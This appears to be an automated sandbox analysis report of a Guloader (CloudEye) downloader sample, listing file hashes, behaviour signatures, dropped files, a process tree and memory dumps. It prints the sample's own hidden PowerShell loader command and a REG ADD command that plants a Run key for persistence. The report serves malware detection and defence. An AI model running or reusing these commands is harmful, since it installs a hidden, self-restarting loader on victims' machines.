Analysis
- max time kernel: 122s
- max time network: 127s
- platform: windows7_x64
- resource: win7-20240508-en
- resource tags: arch:x64, arch:x86, image:win7-20240508-en, locale:en-us, os:windows7-x64, system
- submitted: 26-06-2024 01:10
Static task: static1
Behavioral tasks:
- behavioral1: Sample 3b3d77d803a17ea29440f2a306de9cc86b25d9212c84f10752fa524751bf039c.exe, Resource win7-20240508-en
- behavioral2: Sample 3b3d77d803a17ea29440f2a306de9cc86b25d9212c84f10752fa524751bf039c.exe, Resource win10v2004-20240508-en
- behavioral3: Sample $PLUGINSDIR/Banner.dll, Resource win7-20240221-en
- behavioral4: Sample $PLUGINSDIR/Banner.dll, Resource win10v2004-20240508-en
- behavioral5: Sample $PLUGINSDIR/BgImage.dll, Resource win7-20231129-en
- behavioral6: Sample $PLUGINSDIR/BgImage.dll, Resource win10v2004-20240226-en
- behavioral7: Sample $PLUGINSDIR/nsDialogs.dll, Resource win7-20240611-en
- behavioral8: Sample $PLUGINSDIR/nsDialogs.dll, Resource win10v2004-20240508-en
General
- Target: 3b3d77d803a17ea29440f2a306de9cc86b25d9212c84f10752fa524751bf039c.exe
- Size: 489KB
- MD5: fa45fc9a0330174313e4e08e31d22181
- SHA1: ceb0106d1e8709456e8be6f842badbebde62b567
- SHA256: 3b3d77d803a17ea29440f2a306de9cc86b25d9212c84f10752fa524751bf039c
- SHA512: 5939798d1adc2e30f4b53f8e1a2ebe670f2a34b42a6551b24fa0f86f632aeda13dea009489602d4189581cb4bae442d9aecccc3a7020886e560fc07142a61d5b
- SSDEEP: 12288:/qgow9mQ72+RS2x0mcNasY75T3vCVvMWBFbwLkM:x9mg5Sc7kvhFbwT
Malware Config
Signatures
- Guloader, Cloudeye
  A shellcode based downloader first seen in 2020.
- Command and Scripting Interpreter: PowerShell (1 TTPs, 1 IoCs)
  Run Powershell and hide display window.
- Loads dropped DLL (3 IoCs)
  Processes (pid, process):
  1924 | 3b3d77d803a17ea29440f2a306de9cc86b25d9212c84f10752fa524751bf039c.exe (3 events)
- Adds Run key to start application (2 TTPs, 1 IoCs)
  Processes (description, ioc, process):
  Set value (str) | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\teatertordens = "%Grandeval% -windowstyle minimized $Subereous=(Get-ItemProperty -Path 'HKCU:\\huxleian\\').Salgsenhederne;%Grandeval% ($Subereous)" | reg.exe
- Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 2 IoCs)
- Drops file in System32 directory (1 IoCs)
  Processes (description, ioc, process):
  File created | C:\Windows\SysWOW64\energetiskes\Physicianer223.lnk | 3b3d77d803a17ea29440f2a306de9cc86b25d9212c84f10752fa524751bf039c.exe
- Suspicious use of NtCreateThreadExHideFromDebugger (2 IoCs)
  Processes (pid, process):
  2696 | wab.exe (2 events)
- Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
  Processes (pid, process):
  2724 | powershell.exe
  2696 | wab.exe
- Suspicious use of SetThreadContext (1 IoCs)
  Processes (description, pid, process, target process):
  PID 2724 set thread context of 2696 | 2724 | powershell.exe | wab.exe
- Drops file in Program Files directory (3 IoCs)
  Processes (description, ioc, process):
  File opened for modification | C:\Program Files (x86)\Common Files\Marrowless\Mutated.ini | 3b3d77d803a17ea29440f2a306de9cc86b25d9212c84f10752fa524751bf039c.exe
  File opened for modification | C:\Program Files (x86)\Common Files\eduard.lyz | 3b3d77d803a17ea29440f2a306de9cc86b25d9212c84f10752fa524751bf039c.exe
  File opened for modification | C:\Program Files (x86)\Common Files\yeastless.Rus | 3b3d77d803a17ea29440f2a306de9cc86b25d9212c84f10752fa524751bf039c.exe
- Drops file in Windows directory (1 IoCs)
  Processes (description, ioc, process):
  File opened for modification | C:\Windows\schematizers.roa | 3b3d77d803a17ea29440f2a306de9cc86b25d9212c84f10752fa524751bf039c.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Modifies registry key (1 TTPs, 1 IoCs)
- Suspicious behavior: EnumeratesProcesses (8 IoCs)
  Processes (pid, process):
  2724 | powershell.exe (8 events)
- Suspicious behavior: MapViewOfSection (1 IoCs)
  Processes (pid, process):
  2724 | powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  Processes (description, pid, process):
  Token: SeDebugPrivilege | 2724 | powershell.exe
- Suspicious use of WriteProcessMemory (18 IoCs)
  Processes (description, pid, process, target process):
  PID 1924 wrote to memory of 2724 | 1924 | 3b3d77d803a17ea29440f2a306de9cc86b25d9212c84f10752fa524751bf039c.exe | powershell.exe (4 events)
  PID 2724 wrote to memory of 2696 | 2724 | powershell.exe | wab.exe (6 events)
  PID 2696 wrote to memory of 2784 | 2696 | wab.exe | cmd.exe (4 events)
  PID 2784 wrote to memory of 2856 | 2784 | cmd.exe | reg.exe (4 events)
Processes (process tree, children indented under their parent)
1. C:\Users\Admin\AppData\Local\Temp\3b3d77d803a17ea29440f2a306de9cc86b25d9212c84f10752fa524751bf039c.exe
   Command line: "C:\Users\Admin\AppData\Local\Temp\3b3d77d803a17ea29440f2a306de9cc86b25d9212c84f10752fa524751bf039c.exe"
   - Loads dropped DLL
   - Drops file in System32 directory
   - Drops file in Program Files directory
   - Drops file in Windows directory
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: "powershell.exe" -windowstyle hidden "$Informationsmngders155=Get-Content 'C:\Users\Admin\AppData\Local\Temp\overmandede\Metran\menubilledet\Aspalathus205.Sno';$Bygningattestens=$Informationsmngders155.SubString(71040,3);.$Bygningattestens($Informationsmngders155)"
      - Command and Scripting Interpreter: PowerShell
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: MapViewOfSection
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      3. C:\Program Files (x86)\windows mail\wab.exe
         Command line: "C:\Program Files (x86)\windows mail\wab.exe"
         - Suspicious use of NtCreateThreadExHideFromDebugger
         - Suspicious use of NtSetInformationThreadHideFromDebugger
         - Suspicious use of WriteProcessMemory
         4. C:\Windows\SysWOW64\cmd.exe
            Command line: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "teatertordens" /t REG_EXPAND_SZ /d "%Grandeval% -windowstyle minimized $Subereous=(Get-ItemProperty -Path 'HKCU:\huxleian\').Salgsenhederne;%Grandeval% ($Subereous)"
            - Suspicious use of WriteProcessMemory
            5. C:\Windows\SysWOW64\reg.exe
               Command line: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "teatertordens" /t REG_EXPAND_SZ /d "%Grandeval% -windowstyle minimized $Subereous=(Get-ItemProperty -Path 'HKCU:\huxleian\').Salgsenhederne;%Grandeval% ($Subereous)"
               - Adds Run key to start application
               - Modifies registry key
Downloads
- C:\Users\Admin\AppData\Local\Temp\overmandede\Metran\menubilledet\Aspalathus205.Sno
  Filesize: 69KB
  MD5: a88b20a14329d1a11a3a2c8a6abfefd7
  SHA1: 40a7ca63f9cf6ab08e4fb057cbb68814c329d440
  SHA256: 7f5dc21864aed86bbc14e1a4e44e2f6b9cf48fef09f5d69ce4ef330dd0476606
  SHA512: 54baf64f8ce1740ce1822fc21100f0836baa33b5340421d778de39c3a7468e615638e1a4017d49d4a08c7e0dbcff1a59143ccd18a89b87310da59bba785a2b8c
- C:\Users\Admin\AppData\Local\Temp\overmandede\Metran\menubilledet\Deserving.Ino
  Filesize: 346KB
  MD5: cec7cb698dfeafe0b5548d514ab1d2f9
  SHA1: 14786f14dc829be8fb518cec820d7fc25891c90c
  SHA256: 7a11597b9a5649a5e346b05aabcc1c965867d82d54cd4bf009e34c5d79b54016
  SHA512: 8baecb90058b24cf0f9876219ad9eda86454ba494b717f510282b5ba3c74c2ab56f116636c6f505805293b190c6ccde1f290c98c91e9090322dd87171ab253ae
- \Users\Admin\AppData\Local\Temp\nsy206D.tmp\Banner.dll
  Filesize: 4KB
  MD5: 843657eaf7240b695624dcf38bb0eb31
  SHA1: ca99a44e737fdeaab56f864ce1ef15a57d2eec90
  SHA256: b935d14c32ad8e16055f7f5794ac3411e601c5ac93155afc623f25b08e2ab82e
  SHA512: 7773d9f6bbd17253d1c96ce225b2f9d3673969b38177afef236d1c5d4aabaae2c07793e07c34f0281ec3b859ae955e83bfe43a598ce7cc6c893ec8c9604f5de3
- \Users\Admin\AppData\Local\Temp\nsy206D.tmp\BgImage.dll
  Filesize: 7KB
  MD5: a98576f0d6b35b466cb881860977fdbc
  SHA1: 28b3dbbd76f15c876b98dce523100aa3256d193a
  SHA256: 6cc4aadae46ee3e7f39b411ba087ec29bc10aa62b6b5b44003c934b3c51cefe2
  SHA512: 29225bfb30e72d7d3d3571e7562b5901dbf2382af1972cc9a2be8e3bef697b9ac9e0aaac3a9bca191da827ad3cfce7f6876e8be9444663e83a7e2e86788a733c
- \Users\Admin\AppData\Local\Temp\nsy206D.tmp\nsDialogs.dll
  Filesize: 9KB
  MD5: 2c84faebfda2abe3b16fdf374df4272f
  SHA1: a5b0258a94e0440aefe1ef320e62e7a9a1c8bb40
  SHA256: 72b38e4cca0af336655d55501c4ea05080baaa9921a62a2d717afe90bb801004
  SHA512: 207164cc6914c59d9f4f3b8ae97628c544093ba6ecda9f8da351f453cd97e03be7a640264b8686b2d5e6f3c787f4df1d8a1ebc8e51fd788a97460cd981cc015e
Memory dumps (file, filesize):
- memory/2696-61-0x0000000001C80000-0x0000000006185000-memory.dmp: 69.0MB
- memory/2696-39-0x0000000000C10000-0x0000000001C72000-memory.dmp: 16.4MB
- memory/2724-28-0x0000000072F61000-0x0000000072F62000-memory.dmp: 4KB
- memory/2724-32-0x0000000072F60000-0x000000007350B000-memory.dmp: 5.7MB
- memory/2724-31-0x0000000072F60000-0x000000007350B000-memory.dmp: 5.7MB
- memory/2724-36-0x0000000006720000-0x000000000AC25000-memory.dmp: 69.0MB
- memory/2724-37-0x0000000072F60000-0x000000007350B000-memory.dmp: 5.7MB
- memory/2724-30-0x0000000072F60000-0x000000007350B000-memory.dmp: 5.7MB
- memory/2724-29-0x0000000072F60000-0x000000007350B000-memory.dmp: 5.7MB